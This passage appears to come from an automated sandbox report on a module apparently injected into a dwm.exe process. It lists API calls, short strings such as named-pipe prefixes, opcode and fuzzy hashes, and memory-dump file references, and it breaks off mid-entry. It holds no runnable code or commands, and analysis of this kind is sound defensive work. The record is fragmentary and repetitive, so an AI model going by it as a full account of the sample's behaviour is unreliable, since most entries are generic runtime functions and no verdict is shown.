                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 367353b48e221a3c5ecd7d2a76fa55b4aa0caf19274d3d3b5dde40a6e4ae799c
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: 5E81D16170024187FE54AB29A479359F3F2E7ADB80F344225ADC943396DB39C94DC732
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002BAAE26A6E7,?,?,?,000002BAAE26911C,?,?,?,?,000002BAAE268C25), ref: 000002BAAE26A5AD
                                                  • GetLastError.KERNEL32(?,?,?,000002BAAE26A6E7,?,?,?,000002BAAE26911C,?,?,?,?,000002BAAE268C25), ref: 000002BAAE26A5BB
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002BAAE26A6E7,?,?,?,000002BAAE26911C,?,?,?,?,000002BAAE268C25), ref: 000002BAAE26A5E5
                                                  • FreeLibrary.KERNEL32(?,?,?,000002BAAE26A6E7,?,?,?,000002BAAE26911C,?,?,?,?,000002BAAE268C25), ref: 000002BAAE26A653
                                                  • GetProcAddress.KERNEL32(?,?,?,000002BAAE26A6E7,?,?,?,000002BAAE26911C,?,?,?,?,000002BAAE268C25), ref: 000002BAAE26A65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction ID: 67ad33f99c16100b694be7d4bda31e50dfc199e2cb19917815ddec8497a3ad11
                                                  • Opcode Fuzzy Hash: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction Fuzzy Hash: 9031C4A171264091EE22DB16A828799B3B4F76CBA4F394735DD9D0B390DF38C44DD722
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction ID: da555e6fdef0ee96d1eae98c8880fb9e7c0933bdf5a0385a8fb738104fc9a6d5
                                                  • Opcode Fuzzy Hash: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction Fuzzy Hash: 08118272310A8087EB508B56E86831973B0F79CFE5F244224EE9E87BA4DF78C408C755
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D8FF
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D935
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D962
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D973
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D984
                                                  • SetLastError.KERNEL32(?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26D99F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction ID: cba4ec183b48f053f6ed1552204ba780fc7679f01486ec4e67a62e2e22c83b06
                                                  • Opcode Fuzzy Hash: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction Fuzzy Hash: FD115E2130264442FE64673555BD329B3B2FB7C7B0F340B24A9FA477D6DF689449C222
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction ID: 6bc8b915d31476aa79d69071b4b1e9b907a545897f58bbff127b031fa4db9361
                                                  • Opcode Fuzzy Hash: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction Fuzzy Hash: 2901ED6571174083EF249B21E86C71973B0EB9DB46F240539C98D067A4EF3DC54CC726
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction ID: 69e93929604b7cb9a7ac5b2c1c8c58fcc7c45cb290138c839a0e561bacff1fec
                                                  • Opcode Fuzzy Hash: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction Fuzzy Hash: 8DF0AF6230468092EF208B20F6A879AB370F75CB99F944030CECD86654DF3CCA9CCB21
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction ID: 17a995b734f2254a8d67e4483a457ec04c429ab7ab509546b5d5e94ddc0f267d
                                                  • Opcode Fuzzy Hash: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction Fuzzy Hash: 88F06DA1311A0082EE149B24E8693697330FB9CBA2FA45319DAAA462E4DF3CC04CC725
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction ID: 9e574a343b299fb44680af4914937d9ecb744912e13ca28a0a1af507c75af700
                                                  • Opcode Fuzzy Hash: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction Fuzzy Hash: 79F05EA4704B8082EE108B17B968119B371FB8CFC1F649130EE860BB28DF28C469C721
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 679512ee85ed2335c3889eafa72e0f2ac500502b8b0add1f488b57620ddc9e17
                                                  • Instruction ID: 1889f701a348e201f65b8f9a34cf246996798d984cdf963b9f4624a3befb7fdc
                                                  • Opcode Fuzzy Hash: 679512ee85ed2335c3889eafa72e0f2ac500502b8b0add1f488b57620ddc9e17
                                                  • Instruction Fuzzy Hash: 3561A936519B84C6EB609B19E4A831AB7F4F39C744F204615EACE47BA8DB7CC548CF12
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 68c5a1574e397dc7478919f07c7b2b2d4b2c9b70235e2e5b43720a9ef04d0981
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: DA1186B2B50B2101FF541329E47E3693361AB5D378F390624A9F6066DACB28884DD52A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction ID: a4eb64929812e8033e69a2ed53718c89111de2ec44e919c2953155434c1083de
                                                  • Opcode Fuzzy Hash: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction Fuzzy Hash: 2351C5723116408BEF58CF15E468B6CB3B1F368B98F648221EEC687788DB79D849C711
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction ID: 8edb8b1b582e734f2fb662c76de3ad4f30d202aec198d68d57da83b5f61846d2
                                                  • Opcode Fuzzy Hash: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction Fuzzy Hash: 7C61AC72504BC482EB709B25E85439AF7B0F7A9B88F244315EBD803B99DF78C198CB11
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: f3a7847bb8730cfa6166d772bfac41a44442a78086f24284f3edacac220b48f0
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 06519F3250439086EF748F25D8A8358B7B0F369B94F389215DAD947BD5CB38D869CB12
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction ID: acfc79ee2f113509d1d873a2f9495e8362a8fff2ad8f0390977f26ab11e0d95c
                                                  • Opcode Fuzzy Hash: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction Fuzzy Hash: 52115461314B8192FF209725E82835AB3B4F7AC745FA04235EED9936D4EF28C91DC726
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction ID: d79dac6713a67cfecff04b9e637046bc5ff13f5286f57383b407983ec957d9f3
                                                  • Opcode Fuzzy Hash: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction Fuzzy Hash: FC318221701B9183EF24CF56D968769B7B0FBA8B80F2841348F8847B55EF34D869C711
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction ID: 81ec72df591bbd4e5993bdefe374d1829901e44de4c13bce06d02ef31bf384d6
                                                  • Opcode Fuzzy Hash: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction Fuzzy Hash: CDD1F1B3704A808AEB11CF69D8683AD37B1F359B98F244216DE9D97B99DB34C40AC351
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction ID: 13ea85d36438306c24ea624976f2fcbe0ca98e4fef4d051e6dc236a78da9367a
                                                  • Opcode Fuzzy Hash: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction Fuzzy Hash: 81012972610B90C6EB08DF66E81815AB7B1F78CF81F194425DF8953728DF34D459C751
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BAAE2732BB), ref: 000002BAAE2733EC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BAAE2732BB), ref: 000002BAAE273477
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction ID: 35fc1107bf081264df64c9486ac9709f05bb1256d20e54d9c1a85e7d682889be
                                                  • Opcode Fuzzy Hash: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction Fuzzy Hash: F391E1B271069085FF759F6594A83AD7BB0F34CB88F744109DE8A77A84DB34C48AC722
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
